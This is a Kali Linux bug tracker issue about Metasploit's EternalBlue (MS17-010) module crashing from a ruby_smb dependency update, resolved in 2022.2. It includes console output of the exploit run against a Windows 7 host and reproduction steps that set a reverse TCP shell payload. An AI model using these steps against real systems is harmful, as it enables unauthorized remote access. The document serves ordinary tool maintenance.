View Issue Details
| ID | Project | Category | View Status | Date Submitted | Last Update |
|---|---|---|---|---|---|
| 0007672 | Kali Linux | [All Projects] Kali Package Bug | public | 2022-04-18 01:46 | 2022-04-18 19:55 |
| Reporter | 4oo4 | Assigned To | daniruiz | ||
| Priority | normal | Severity | minor | Reproducibility | always |
| Status | resolved | Resolution | fixed | ||
| Product Version | 2022.1 | ||||
| Target Version | Fixed in Version | 2022.2 | |||
| Summary | 0007672: Metasploit 6.1.37 - ms17_010_eternalblue module - Encoding::UndefinedConversionError | ||||
| Description | Metasploit's EternalBlue module crashes with Encoding::UndefinedConversionError when attempting to make an SMB connection: msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 10.9.0.13:4444 [*] 10.10.17.29:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 10.10.17.29:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 10.10.17.29:445 - Scanned 1 of 1 hosts (100% complete) [+] 10.10.17.29:445 - The target is vulnerable. [*] 10.10.17.29:445 - Connecting to target for exploitation. [+] 10.10.17.29:445 - Connection established for exploitation. [+] 10.10.17.29:445 - Target OS selected valid for OS indicated by SMB reply [*] 10.10.17.29:445 - CORE raw buffer dump (42 bytes) [*] 10.10.17.29:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 10.10.17.29:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 10.10.17.29:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 10.10.17.29:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 10.10.17.29:445 - Trying exploit with 12 Groom Allocations. [*] 10.10.17.29:445 - Sending all but last fragment of exploit packet [*] 10.10.17.29:445 - Starting non-paged pool grooming [-] 10.10.17.29:445 - Encoding::UndefinedConversionError [-] 10.10.17.29:445 - "\xF0" to UTF-8 in conversion from ASCII-8BIT to UTF-8 to UTF-16LE [-] 10.10.17.29:445 - /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/ruby_smb-3.1.0/lib/ruby_smb/field/stringz16.rb:6:in `encode' /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/ruby_smb-3.1.0/lib/ruby_smb/field/stringz16.rb:6:in `assign' (eval):2:in `assign' /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/bindata-2.4.10/lib/bindata/struct.rb:190:in `block in define_field_accessors_for' /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:1574:in `make_smb1_free_hole_session_packet' /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:1380:in `smb1_free_hole' /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:1221:in `smb_eternalblue' /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:1132:in `block in exploit_eb' /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activesupport-6.1.5/lib/active_support/core_ext/range/each.rb:9:in `each' /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activesupport-6.1.5/lib/active_support/core_ext/range/each.rb:9:in `each' /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:1130:in `exploit_eb' /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:315:in `exploit' /usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:228:in `job_run_proc' /usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:181:in `run' /usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:144:in `exploit_simple' /usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:171:in `exploit_simple' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:45:in `exploit_single' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:182:in `cmd_exploit' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single' /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run' /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start' /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start' /usr/bin/msfconsole:23:in `<main>' [*] Exploit completed, but no session was created. | ||||
| Steps To Reproduce | - Run Metasploit - msf6 > use exploit/windows/smb/ms17_010_eternalblue - msf6 > set payload windows/x64/shell/reverse_tcp - msf6 > set RHOSTS 1.2.3.4 - msf6 > set LHOST 1.2.3.5 - msf 6 >exploit | ||||
| Additional Information | Version 6.1.39-dev of MetaSploit from the Rapid7 repo does hot have this issue. | ||||
|
|
I've tested it with the latest version of metasploit-framework 6.1.38 and the issue is present, but it does work properly in 6.1.37 |
|
|
The issue was introduced with the package version 6.1.37-0kali2, that's why it still works with 6.1.37-0kali1, and seems to be caused by a ruby dependency |
|
|
The issue is caused by the update of ruby_smb from 3.0.6 to 3.1.0. Changing the version and building the package again fixes the issue. I'll patch it and fill the bug report |
|
|
Bug report https://github.com/rapid7/metasploit-framework/issues/16468 |
|
|
There's already a fix in metasploit-framework https://github.com/rapid7/metasploit-framework/commit/7c8c0b5e05dc6cea1a29461e6564c5ceccd80114 I've patched kali's package and will be soon updated to the repositories |
| Date Modified | Username | Field | Change |
|---|---|---|---|
| 2022-04-18 01:46 | 4oo4 | New Issue | |
| 2022-04-18 14:09 | daniruiz | Assigned To | => daniruiz |
| 2022-04-18 14:09 | daniruiz | Status | new => confirmed |
| 2022-04-18 14:09 | daniruiz | Note Added: 0016047 | |
| 2022-04-18 16:27 | daniruiz | Note Added: 0016048 | |
| 2022-04-18 17:41 | daniruiz | Note Added: 0016049 | |
| 2022-04-18 18:07 | daniruiz | Note Added: 0016050 | |
| 2022-04-18 18:46 | daniruiz | Assigned To | daniruiz => |
| 2022-04-18 18:46 | daniruiz | Assigned To | => daniruiz |
| 2022-04-18 18:46 | daniruiz | Status | confirmed => assigned |
| 2022-04-18 19:54 | daniruiz | Note Added: 0016051 | |
| 2022-04-18 19:55 | daniruiz | Status | assigned => closed |
| 2022-04-18 19:55 | daniruiz | Resolution | open => fixed |
| 2022-04-18 19:55 | daniruiz | Fixed in Version | => 2022.2 |
| 2022-04-18 19:55 | daniruiz | Status | closed => resolved |